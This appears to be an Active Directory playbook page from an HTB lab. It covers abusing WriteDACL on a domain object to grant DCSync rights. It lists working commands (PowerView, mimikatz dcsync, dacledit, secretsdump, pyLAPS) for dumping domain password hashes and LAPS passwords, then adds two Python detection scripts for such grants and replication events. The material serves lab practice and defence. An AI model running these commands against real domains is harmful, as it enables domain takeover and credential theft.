WriteDACL Rights


The members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have permission to modify the DACL (Discretionary Access Control List) of the domain object HTB.LOCAL.

With write access to the target object's DACL, you can grant yourself any privilege you want on the object, including DCSync.

Windows abuse

To abuse WriteDacl to a domain object, you may grant yourself DCSync privileges.

You may need to authenticate to the Domain Controller as a member of EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL if you are not already running a process as a member. To do this in conjunction with Add-DomainObjectAcl, first create a PSCredential object (these examples come from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then, use Add-DomainObjectAcl, optionally specifying $Cred if you are not already running a process as EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL:

Add-DomainObjectAcl -TargetIdentity HTB.LOCAL -Rights DCSync -PrincipalIdentity svc-alfresco

Once you have granted yourself this privilege, you may use the mimikatz dcsync function to DCSync the password of arbitrary principals on the domain:

lsadump::dcsync /domain:testlab.local /user:Administrator

Cleanup can be done using the Remove-DomainObjectAcl function:

Remove-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync

You can also abuse this without Windows-based tooling if you are operating from a Linux host. DCSync.py from n00py lets you authenticate with a plaintext password, an NT hash, or a Kerberos ticket.

To grant the "n00py" user DCSync privileges, authenticating as the user "n00py" with the password "Password123":

./dcsync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local' n00py\\Administrator:Password123

Source: https://github.com/n00py/DCSync

Linux abuse

To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.

Impacket's dacledit can be used for that purpose (cf. "grant rights" reference for the link).

dacledit.py -action 'write' -rights 'DCSync' -principal 'controlledUser' -target-dn 'DomainDistinguishedName' 'domain'/'controlledUser':'password'

Cleanup of the added ACL can be performed later on with the same tool:
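Both the Windows and the Linux procedure above leave the same trace: new ACEs on the domain object's nTSecurityDescriptor that hand the replication extended rights to a principal that should not have them. The following script is an added detection example written for this page; it is not part of the playbook, BloodHound, PowerView, or dacledit. It assumes you have Directory Service Changes auditing on and can pull the old and new SDDL values of the attribute (Event ID 5136), that the replication-right GUIDs are the well-known schema values listed in the code, and that the EXPECTED_TRUSTEES set is tuned to your forest; the SDDL strings and the user SID in it are constructed.

```python
"""Flag newly added ACEs on a domain object's DACL that grant DCSync-capable rights.

Added detection example for this playbook entry; it is not part of the original page or
of BloodHound/PowerView/dacledit.  Input is the SDDL of nTSecurityDescriptor before and
after a change, as surfaced by Directory Service Changes auditing (Event ID 5136).
The SIDs and SDDL strings below are constructed.
"""
import re

# Extended rights DCSync relies on (real AD schema GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Trustees that hold replication rights by default (SDDL aliases). Assumption: extend it
# with the SIDs of sanctioned replicators in your forest before relying on it.
EXPECTED_TRUSTEES = {"BA", "DA", "EA", "ED", "SY"}

ACE_RE = re.compile(r"\(([^)]*)\)")
CONTROL_ACCESS = 0x100     # ADS_RIGHT_DS_CONTROL_ACCESS, "CR" in SDDL
GENERIC_ALL = 0x10000000   # "GA" in SDDL


def parse_aces(sddl):
    """Return the DACL ACEs of an SDDL string as (type, flags, rights, guid, inh_guid, trustee)."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]       # drop a trailing SACL if present
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = [f.strip() for f in body.split(";")]
        if len(fields) != 6:
            continue                    # conditional / resource-attribute ACEs are out of scope
        fields[3], fields[4] = fields[3].lower(), fields[4].lower()
        aces.append(tuple(fields))
    return aces


def has_right(rights, alias, mask):
    """True if an SDDL rights field (alias pairs like 'RPWPCR' or a hex mask) contains a right."""
    if rights.lower().startswith("0x"):
        return int(rights, 16) & mask == mask
    return alias in [rights[i:i + 2] for i in range(0, len(rights), 2)]


def grants_dcsync(ace):
    """Name the replication-relevant right an allow ACE confers, or [] if it confers none."""
    ace_type, _flags, rights, obj_guid, _inh_guid, _trustee = ace
    if ace_type not in ("A", "OA"):
        return []                       # deny / audit ACEs do not grant anything
    if has_right(rights, "GA", GENERIC_ALL):
        return ["GenericAll (implies all extended rights)"]
    if not has_right(rights, "CR", CONTROL_ACCESS):
        return []
    if obj_guid == "":
        return ["AllExtendedRights"]    # CR with no object GUID = every extended right
    name = REPLICATION_RIGHTS.get(obj_guid)
    return [name] if name else []


def new_dcsync_grants(old_sddl, new_sddl):
    """ACEs present after the change but not before that hand DCSync rights to an unexpected trustee."""
    before = set(parse_aces(old_sddl))
    findings = []
    for ace in parse_aces(new_sddl):
        if ace in before:
            continue
        rights = grants_dcsync(ace)
        if rights and ace[5] not in EXPECTED_TRUSTEES:
            findings.append({"trustee": ace[5], "rights": rights, "ace": ace})
    return findings


# Constructed sample: a default-looking domain DACL, then the same DACL after two
# replication ACEs were added for a plain user SID.
USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1108"
OLD_SDDL = ("O:DAG:DAD:AI(A;;RPLCLORC;;;AU)"
            "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
            "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)")
NEW_SDDL = (OLD_SDDL
            + f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{USER_SID})"
            + f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{USER_SID})")

if __name__ == "__main__":
    for f in new_dcsync_grants(OLD_SDDL, NEW_SDDL):
        print(f"ALERT: {f['trustee']} gained {', '.join(f['rights'])}")
```

The check is deliberately broader than the three replication GUIDs: a GenericAll ACE or a bare CR (AllExtendedRights) on the domain object is enough for DCSync even though no replication GUID appears, which is exactly the FullControl case described further down this page.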

DCSync

The AllExtendedRights privilege grants EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL both the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges, which combined allow a principal to replicate objects from the domain HTB.LOCAL.

This can be abused using Impacket's secretsdump.py example script:

secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'
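A replication request like the secretsdump run above is logged on the domain controller as Event ID 4662 whose Properties list the two DS-Replication-Get-Changes GUIDs, raised by an account that is not a domain controller. The script below is an added detection example written for this page, not part of the playbook or of Impacket. It assumes the 4662 records are available as Windows event XML, that the replication-right GUIDs are the well-known schema values in the code, and that the allowed list holds the sAMAccountNames of your domain controllers and sanctioned replicators; the event records, host name, SubjectUserName values and ObjectName GUID are constructed.

```python
"""Flag DCSync-style replication requests in Windows Security Event 4662 records.

Added detection example for this playbook entry; it is not part of the original page
or of Impacket.  The event XML is constructed to mimic the layout of a real 4662
record; host, account names and the ObjectName GUID are made up.
"""
import xml.etree.ElementTree as ET

# Extended rights that a DCSync replication request exercises (real schema GUIDs).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of the domainDNS class
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_4662(xml_text):
    """Return the EventData fields of a 4662 event as a dict, or None for other event IDs."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4662":
        return None
    return {d.get("Name"): (d.text or "").strip()
            for d in root.findall("e:EventData/e:Data", NS)}


def is_dcsync(data, allowed):
    """Return a finding if the event exercises replication rights from an unexpected account."""
    props = data.get("Properties", "").lower()
    rights = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
    if not rights:
        return None
    actor = data.get("SubjectUserName", "")
    if actor.upper() in {a.upper() for a in allowed}:
        return None   # domain controllers (and anything else allow-listed) replicate legitimately
    return {
        "actor": actor,
        "domain": data.get("SubjectDomainName", ""),
        "rights": rights,
        "on_domain_object": DOMAIN_DNS_CLASS in data.get("ObjectType", "").lower(),
    }


def scan(xml_events, allowed=("DC01$", "DC02$")):
    """Run the detection over a batch of event XML strings.  `allowed` is an assumption:
    the sAMAccountNames of your domain controllers plus any sanctioned replication accounts."""
    findings = []
    for xml_text in xml_events:
        data = parse_4662(xml_text)
        if data is not None:
            hit = is_dcsync(data, allowed)
            if hit:
                findings.append(hit)
    return findings


def _event(actor, domain, props, obj_type=DOMAIN_DNS_CLASS):
    """Build a constructed 4662 record in the shape Windows emits (for the sample below)."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4662</EventID><Computer>dc01.htb.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">{actor}</Data>
    <Data Name="SubjectDomainName">{domain}</Data>
    <Data Name="ObjectType">%{{{obj_type}}}</Data>
    <Data Name="ObjectName">%{{0f0c7e2c-5f5b-4f2e-9a2b-2a7d1e8c4f60}}</Data>
    <Data Name="AccessMask">0x100</Data>
    <Data Name="Properties">%%7688\n\t{props}</Data>
  </EventData>
</Event>"""


REPL_PROPS = ("{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t"
              "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")

# Constructed sample: a DC replicating (benign), a service account replicating (DCSync),
# and an unrelated 4662 on a user object with a made-up property GUID.
SAMPLE_EVENTS = [
    _event("DC02$", "HTB", REPL_PROPS),
    _event("svc-alfresco", "HTB", REPL_PROPS),
    _event("jdoe", "HTB", "{deadbeef-0000-4000-8000-000000000001}",
           obj_type="bf967aba-0de6-11d0-a285-00aa003049e2"),  # user class GUID
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"ALERT: {hit['domain']}\\{hit['actor']} requested {', '.join(hit['rights'])}")
```

The match is on the GUIDs in the Properties field rather than on the access mask alone, because 0x100 (control access) is raised for every extended-right check and would be far too noisy on its own; the on_domain_object flag is carried along so an analyst can separate replication of the naming context from anything else.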

Retrieve LAPS Passwords

If FullControl (GenericAll) is obtained on the domain, the AllExtendedRights privilege it includes already grants EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL enough privileges to retrieve LAPS passwords domain-wide, so there is no need to grant DCSync rights first. pyLAPS can be used for that purpose:

pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"
